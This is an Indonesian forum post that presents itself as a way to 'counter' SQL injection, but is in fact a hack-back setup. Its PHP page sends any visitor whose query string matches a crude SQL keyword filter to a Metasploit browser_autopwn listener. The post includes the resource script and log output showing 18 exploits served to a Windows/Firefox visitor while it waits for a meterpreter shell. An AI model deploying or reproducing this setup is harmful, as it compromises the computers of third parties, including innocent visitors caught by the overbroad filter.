> > > >


[Share] menangkal serangan sqli dengan metasploit
xnod_die Offline

7 - 45
#1
Star  04-24-2013, 02:46 PM
Hallo semua... kali ini saya ingin sharing , cara menangkal serangan sqli pada sebuah web,, menggunakan metasploit,,,,
Kebanyakan para attacker itu menggunakan windows,,,,
nah ini merupakan kesempatan bagi kita untuk melakukan serangan balik... :d

langsung aja nh ,,, maaf klo repost....
[hide]
buat script index.php
Code:
<?php
if (isset($_GET['xnod']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $_GET['xnod']))
{
header('Location: http://192.168.1.100:4444');
}
?>
<html>
<body>
Silahkan dicoba
<a href="?xnod=2">test 1</a> - <a href="?xnod=2">test 2</a>- <a href="?xnod=6">test 3</a>
</body>
</html>

sipp sekrang buat script biar lebih mudah gunain metasploit
kasih nama antisqli.rc

Code:
# cat <<EOF> antisqli.rc
> use auxiliary/server/browser_autopwn
> set LHOST 192.168.100
> set SRVPORT 4444
> set URIPATH /
> run
> EOF

Nah sekarang kita jalanin metasploit sambil nunggu si attacker menyerang,,, sambil ngopi2 + makan gorengan..

./msfconsole -q -r antisqli.rc

silahkan tunggu smpe ada log seperti ini
Code:
192.168.1.5:1205 [302]: /?xnod=6%27
lama menunggu akhirnya ada jga yg kena nh..

Code:
msf  auxiliary(browser_autopwn) >
[*] 192.168.1.5    browser_autopwn - Handling '/'
[*] 192.168.1.5     browser_autopwn - Handling '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tVVM6eDg2OkZpcmVmb3g6MTIuMDo%3d'
[*] 192.168.1.5     browser_autopwn - JavaScript Report: Microsoft Windows:7:undefined:en-US:x86:Firefox:12.0:
[*] 192.168.1.5    browser_autopwn - Responding with 18 exploits
nah tunggu smpe masuk meterpreter,,, dan selanjutnya terserah anda,,,,, wkwkkwk
[/hide]
regards xnod_die
(This post was last modified: 08-04-2014, 05:10 AM by iKONspirasi.)  
Find
Reply


Messages In This Thread
menangkal serangan sqli dengan metasploit - by xnod_die - 04-24-2013, 02:46 PM




Users browsing this thread: 1 Guest(s)